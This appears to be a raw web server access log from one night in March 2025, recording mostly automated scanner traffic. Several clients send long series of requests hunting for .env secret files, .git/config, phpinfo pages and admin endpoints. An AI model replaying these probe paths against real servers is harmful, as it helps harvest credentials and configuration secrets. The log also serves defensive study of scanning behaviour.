204.76.203.15 - - [15/Mar/2025:01:04:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.91.127.81 - - [15/Mar/2025:01:20:11 +0100] "CONNECT api.ip.pn:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0"
156.59.198.136 - - [15/Mar/2025:01:22:20 +0100] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11582000.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.147.214.250 - - [15/Mar/2025:01:52:33 +0100] "GET /app/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:34 +0100] "GET /api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:39 +0100] "GET /.env.production HTTP/1.1" 404 287 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:41 +0100] "GET /.env.local HTTP/1.1" 404 284 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:41 +0100] "GET /.env.dev HTTP/1.1" 404 282 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:42 +0100] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:43 +0100] "GET /server/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:44 +0100] "GET /www/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:44 +0100] "GET /web/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0"
185.147.214.250 - - [15/Mar/2025:01:52:51 +0100] "GET /fastapi/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0"
35.216.252.127 - - [15/Mar/2025:02:00:40 +0100] "\x16\x03\x01" 400 383 "-" "-"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET / HTTP/1.1" 200 423 "-" "abuse.xmco.fr"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET /config.json HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET /telescope/requests HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.252.127 - - [15/Mar/2025:02:00:41 +0100] "GET /server-status HTTP/1.1" 403 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
156.59.198.136 - - [15/Mar/2025:02:04:27 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12243430.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [15/Mar/2025:02:05:23 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 9; G8343 Build/47.2.A.10.107; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.111 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/229.1.0.17.118;]"
20.65.194.108 - - [15/Mar/2025:02:33:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
103.203.56.3 - - [15/Mar/2025:02:46:02 +0100] "GET / HTTP/1.1" 200 423 "-" "HTTP Banner Detection (https://security.ipip.net)"
194.38.23.16 - - [15/Mar/2025:02:57:45 +0100] "GET /public/assets/global/plugins/elrte/src/elrte.src.html HTTP/1.1" 404 405 "-" "ALittle Client"
194.38.23.16 - - [15/Mar/2025:02:57:45 +0100] "GET /assets/admin/global/plugins/elrte/src/elrte.src.html HTTP/1.1" 404 404 "-" "ALittle Client"
194.38.23.16 - - [15/Mar/2025:02:57:50 +0100] "GET /assets/js/plugins/elrte/src/elrte.src.html HTTP/1.1" 404 407 "-" "ALittle Client"
88.214.25.123 - - [15/Mar/2025:03:14:29 +0100] "\x03" 400 383 "-" "-"
114.119.138.33 - - [15/Mar/2025:03:20:31 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
165.154.36.91 - - [15/Mar/2025:03:24:36 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
198.235.24.198 - - [15/Mar/2025:03:55:23 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [15/Mar/2025:03:59:27 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10344966.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.88.132.242 - - [15/Mar/2025:04:17:00 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.119"
156.59.198.135 - - [15/Mar/2025:04:17:18 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11053576.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [15/Mar/2025:04:17:27 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10742321.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [15/Mar/2025:04:31:23 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
196.251.85.238 - - [15/Mar/2025:04:31:46 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
196.251.70.87 - - [15/Mar/2025:04:50:55 +0100] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
156.59.198.135 - - [15/Mar/2025:04:53:33 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image115.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.15 - - [15/Mar/2025:04:57:49 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
57.129.64.237 - - [15/Mar/2025:05:10:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
141.98.11.175 - - [15/Mar/2025:05:17:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
115.231.78.11 - - [15/Mar/2025:05:24:41 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
115.231.78.11 - - [15/Mar/2025:05:24:42 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
115.231.78.11 - - [15/Mar/2025:05:24:43 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
156.59.198.135 - - [15/Mar/2025:05:25:43 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12076098.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [15/Mar/2025:05:32:10 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
47.92.228.51 - - [15/Mar/2025:05:38:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
47.92.228.51 - - [15/Mar/2025:05:38:41 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "curl/7.75.0"
147.185.132.98 - - [15/Mar/2025:05:40:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [15/Mar/2025:05:46:47 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image051.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [15/Mar/2025:05:46:56 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11671602.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.144.212.40 - - [15/Mar/2025:06:00:10 +0100] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; U; Android 9; en-US; RMX1851 Build/PKQ1.190101.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.12.8.1206 Mobile Safari/537.36"
156.59.198.136 - - [15/Mar/2025:06:05:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961187.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [15/Mar/2025:06:16:57 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
92.255.57.58 - - [15/Mar/2025:06:21:32 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.148.10.90 - - [15/Mar/2025:06:35:21 +0100] "\x16\x03\x01" 400 383 "-" "-"
45.148.10.90 - - [15/Mar/2025:06:35:21 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
45.148.10.90 - - [15/Mar/2025:06:35:21 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
45.148.10.90 - - [15/Mar/2025:06:35:21 +0100] "GET /dashboard/.git/config HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.90 - - [15/Mar/2025:06:35:22 +0100] "GET /project/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.90 - - [15/Mar/2025:06:35:22 +0100] "GET /v3/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.90 - - [15/Mar/2025:06:35:22 +0100] "GET /.env.live HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.90 - - [15/Mar/2025:06:35:22 +0100] "GET /client/.git/config HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.90 - - [15/Mar/2025:06:35:22 +0100] "GET /data/private/.git/config HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
156.59.198.135 - - [15/Mar/2025:06:37:52 +0100] "GET /renault.activities.at/htdocs/ewp/ew_includes/popups/ew_images/refresh.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
204.76.203.15 - - [15/Mar/2025:06:45:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [15/Mar/2025:06:53:03 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11444428.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [15/Mar/2025:07:07:15 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
170.106.165.76 - - [15/Mar/2025:07:15:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
220.248.224.226 - - [15/Mar/2025:07:59:40 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
156.59.198.135 - - [15/Mar/2025:08:12:16 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10623445.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [15/Mar/2025:08:15:44 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11185030.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.35.44 - - [15/Mar/2025:08:15:56 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.125.43 - - [15/Mar/2025:08:16:03 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.224 - - [15/Mar/2025:08:49:09 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:49:09 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.224 - - [15/Mar/2025:08:49:09 +0100] "GET /portal/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENAU)"
78.153.140.224 - - [15/Mar/2025:08:49:10 +0100] "GET /env.txt HTTP/1.1" 404 352 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Tablet PC 2.0; .NET4.0C; .NET4.0E)"
78.153.140.224 - - [15/Mar/2025:08:49:10 +0100] "GET /phpinfo/ HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
78.153.140.224 - - [15/Mar/2025:08:49:11 +0100] "GET /images/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1) Opera 12.16"
78.153.140.224 - - [15/Mar/2025:08:49:11 +0100] "GET /.env.save.1 HTTP/1.1" 404 356 "-" "Opera/9.52 (X11; Linux i686; U; fr)"
78.153.140.224 - - [15/Mar/2025:08:49:11 +0100] "GET /apis/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:44.0) Gecko/20100101 Firefox/44.0"
78.153.140.224 - - [15/Mar/2025:08:49:11 +0100] "GET /platform/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/604.1.17 (KHTML, like Gecko) Version/10.2 Safari/604.1.17"
78.153.140.224 - - [15/Mar/2025:08:49:11 +0100] "GET /developer/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.6) Gecko/20040207 Firefox/0.8"
78.153.140.224 - - [15/Mar/2025:08:49:12 +0100] "GET /stag/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre"
78.153.140.224 - - [15/Mar/2025:08:49:13 +0100] "GET /.env.json HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20060202 CentOS/1.0.7-1.4.3.centos4 Firefox/1.0.7"
78.153.140.224 - - [15/Mar/2025:08:49:13 +0100] "GET /exapi/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:49:13 +0100] "GET /inf/ HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en-GB]"
78.153.140.224 - - [15/Mar/2025:08:49:14 +0100] "GET /libs/.env HTTP/1.1" 404 354 "-" "Opera/9.26 (Macintosh; PPC Mac OS X; U; en)"
78.153.140.224 - - [15/Mar/2025:08:49:14 +0100] "GET /base_dir/.env HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
78.153.140.224 - - [15/Mar/2025:08:49:15 +0100] "GET /components/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4A Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.116 Mobile Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:49:16 +0100] "GET /controllers/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; Android 4.1.2; ALCATEL ONE TOUCH 5020T Build/JZO54K) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31"
78.153.140.224 - - [15/Mar/2025:08:49:16 +0100] "GET /counterwallet/.env HTTP/1.1" 404 363 "-" "Opera/9.61 (X11; Linux i686; U; pl) Presto/2.1.1"
78.153.140.224 - - [15/Mar/2025:08:49:16 +0100] "GET /env_file_example.env HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 6.0; rv:44.0) Gecko/20100101 Firefox/44.0"
78.153.140.224 - - [15/Mar/2025:08:49:18 +0100] "GET /environment HTTP/1.1" 404 356 "-" "Opera/6.05 (Windows 2000; U) [en]"
78.153.140.224 - - [15/Mar/2025:08:49:19 +0100] "GET /function/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-tw) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5"
78.153.140.224 - - [15/Mar/2025:08:49:21 +0100] "GET /httpdocs/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
78.153.140.224 - - [15/Mar/2025:08:49:32 +0100] "GET /laravel/core/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:49:41 +0100] "GET /new-js/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/528+ (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1"
78.153.140.224 - - [15/Mar/2025:08:49:47 +0100] "GET /noVNC/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040630 Firefox/0.9.1"
78.153.140.224 - - [15/Mar/2025:08:49:51 +0100] "GET /orientdb-client/.env HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1"
78.153.140.224 - - [15/Mar/2025:08:49:51 +0100] "GET /packages/frontend/.env HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Z981 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:49:52 +0100] "GET /patchwork/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:49:52 +0100] "GET /portal1/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)"
78.153.140.224 - - [15/Mar/2025:08:49:57 +0100] "GET /public_root/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/ Safari/530.6"
78.153.140.224 - - [15/Mar/2025:08:49:59 +0100] "GET /server/config/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G930F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:50:00 +0100] "GET /socketio/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 OPR/36.0.2130.65"
78.153.140.224 - - [15/Mar/2025:08:50:01 +0100] "GET /src/client/mobile/.env HTTP/1.1" 404 367 "-" "Opera/9.80 (Android; Opera Mini/28.0.2254/66.299; U; en) Presto/2.12.423 Version/12.16"
78.153.140.224 - - [15/Mar/2025:08:50:02 +0100] "GET /st/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8b5) Gecko/20051006 Firefox/1.4.1"
78.153.140.224 - - [15/Mar/2025:08:50:05 +0100] "GET /system-config/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
78.153.140.224 - - [15/Mar/2025:08:50:07 +0100] "GET /wconnect/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Linux; Android 6.0; Lenovo A7020a48 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36"
78.153.140.224 - - [15/Mar/2025:08:50:08 +0100] "GET /websocket/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:47.0) Gecko/20100101 Firefox/47.0"
205.210.31.176 - - [15/Mar/2025:09:21:39 +0100] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.176 - - [15/Mar/2025:09:21:39 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.138.178.154 - - [15/Mar/2025:09:38:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.138.178.154 - - [15/Mar/2025:09:39:10 +0100] "SSH-2.0-Go" 400 383 "-" "-"
3.138.178.154 - - [15/Mar/2025:09:39:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.138.178.154 - - [15/Mar/2025:09:41:28 +0100] "" 400 383 "-" "-"
156.59.198.136 - - [15/Mar/2025:09:48:20 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image018.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
203.212.104.171 - - [15/Mar/2025:09:49:39 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
74.82.47.3 - - [15/Mar/2025:09:58:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
74.82.47.3 - - [15/Mar/2025:10:00:53 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
74.82.47.3 - - [15/Mar/2025:10:01:33 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
74.82.47.3 - - [15/Mar/2025:10:02:11 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
74.82.47.3 - - [15/Mar/2025:10:02:13 +0100] "GET /phpinfo.php HTTP/1.1" 200 10254 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
74.82.47.3 - - [15/Mar/2025:10:02:15 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
117.248.2.106 - - [15/Mar/2025:10:03:51 +0100] "POST /HNAP1/ HTTP/1.0" 400 373 "-" "-"
141.98.11.175 - - [15/Mar/2025:10:17:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.116.134.171 - - [15/Mar/2025:10:25:16 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
204.76.203.15 - - [15/Mar/2025:10:31:33 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
